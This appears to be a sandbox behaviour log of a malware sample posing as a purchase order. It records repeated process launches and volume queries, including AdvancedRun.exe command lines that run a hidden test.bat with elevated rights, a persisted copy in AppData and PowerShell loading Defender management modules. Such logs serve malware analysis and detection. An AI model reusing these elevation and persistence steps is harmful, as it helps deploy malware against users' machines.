                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Queries volume information: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | VolumeInformation
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | Queries volume information: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | Queries volume information: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
